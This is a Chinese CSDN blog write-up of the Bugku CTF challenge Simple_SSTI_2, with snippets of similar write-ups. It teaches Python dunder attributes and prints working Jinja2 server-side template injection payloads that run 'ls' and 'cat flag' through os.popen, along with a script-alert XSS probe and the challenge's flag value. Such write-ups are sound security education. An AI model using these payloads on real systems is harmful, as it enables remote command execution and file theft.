Simple_SSTI_2

最新推荐文章于 2024-11-17 22:03:55 发布
最新推荐文章于 2024-11-17 22:03:55 发布
阅读量1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53568983/article/details/129313386
文章介绍了Python类的内置属性,特别是__init__,并展示了如何利用这些属性结合os.popen方法查看当前目录和读取文件。解题步骤包括查看当前目录和打开无后缀的flag文件来获取flag值。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Simple_SSTI_2

前言

要想做到这个题,先要了解SSTI_2模板注入详解

一、python类的内置属性

先看如下一段代码:

class Restaurant:
    """类"""

    def __init__(self, restaurant_name, cuisine_type):
        self.restaurant_name = restaurant_name
        self.cuisine_type = cuisine_type

    def describe_restaurant(self):
        print(f"{self.restaurant_name} -> {self.cuisine_type}")

    def open_restaurant(self):
        print('营业中')

restaurant = Restaurant('7天酒店', 100)
print(restaurant.__init__)

什么是内置属性如上的__init__就是内置属性,可以这么认为,内置属性就是__英文字母__这样格式的字符串

  • class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类
  • init 初始化类,返回的类型是function
  • globals[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
  • os.popen() 方法用于从一个命令打开一个管道。
  • open() 方法用于打开一个文件,并返回文件对象
    python内置属性大全

二、解题步骤

1.查看当前目录

?flag = {{ config.__class__.__init__.__globals__['os'].popen('ls ').read() }}

在这里插入图片描述

为什么是这样的了?,为什么这样就可以查看当前目录了?,这又是什么东西?,好,你先输入?flag = <script>alert(1)</script>,会出现弹窗,但是这不是反射性xss,也可以说是反射型xss,但是flag不存在前端,反射性xss一般是获取前端数据

  • {{}}:类似于python的f"{变量}"解释变量
  • config.class.init.globals[‘os’]:配置的类的操作系统
  • popen(‘’):系统语句
  • read():读取语句类容

2. 打开flag文件得到flag

在Linux操作系统下,没有后缀的文件当作文本文件处理

?flag = {{ config.__class__.__init__.__globals__['os'].popen('cat flag ').read() }}

在这里插入图片描述

flag:flag{c77ca5c36d8baa014fa9bd96b8933719}

BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 2024
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 703
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
WEB Simple_SSTI_2
m0_57954651的博客
05-02 502
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
Bugku:Simple_SSTI_2
热门推荐
qq_46230755的博客
03-10 1万+
我超喜欢这种题目的,确实对我这种萌新非常的友好 打开后,题目提示存在模板注入 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5536
bugku-ctf
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2767
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 1063
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
BugKu:Simple_SSTI
m0_63944205的博客
07-30 215
如图所示,我们会得到相关的提示,根据提示信息,我们利用。1.这里我们看到需要我们注入一个flag参数。3.这里我们去传入flag查看config。1.这里告诉我们需要传一个flag的参数。3.这里我们利用flask的模板注入。的模板注入,就能直接得到flag。2.我们f12查看这里提示我们。2.我们同样的去查看页面源代码。发现页面很乱,不能得到有用信息。4.我们尝试SSTI模版注入。5.我们依次读取目录看看\。我们发现了flage目录,6.我们查看flage。
bugku web Simple_SSTI_2
最新发布
03-27
嗯,用户需要关于Bugku平台上Web题目Simple_SSTI_2的解决方案或详细信息。首先,我得回忆一下SSTI(服务器端模板注入)的基本概念。SSTI通常发生在使用模板引擎渲染用户输入时,如果未正确过滤输入,攻击者可以注入...
Bugku:Simple_SSTI_2(小宇特详解)
小宇的web博客
06-17 2437
Bugku:Simple_SSTI_2(小宇特详解) 1.这里还是提示模板注入。这里ls查看存在的文件 /?flag={{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }} 2.这里先查看app文件 ?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app/’).read() }} 3.这里由于没有过滤可以直接访问 ?flag={{ config.class.init.globals[
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2
时光隧道
06-22 6151
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 702
BUGKU-WEB Simple_SSTI_2
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1607
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
[bugku]Simple_SSTI_2
ZhShy
03-10 3494
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
Bugku CTF_Web——Simple_SSTI_2
weixin_71914594的博客
11-17 259
发现这是python的模块注入。进入app目录找到flag。传入名为flag的参数。只能一个一个慢慢找了。
XCTF shrine wp
Lakers248_的博客
05-12 320
XCTF shrine wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三年之约-第二年

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值